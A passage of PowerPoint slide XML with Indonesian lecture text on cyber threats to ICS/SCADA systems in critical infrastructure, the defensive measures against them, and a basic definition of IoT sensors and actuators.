            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manufaktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengolahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekonomi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICS dan SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkisar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekonomi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Malware, ransomware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICS dan SCADA, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379598395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Internet of Things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Internet of Things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelembapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktuator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh sensor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termostat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
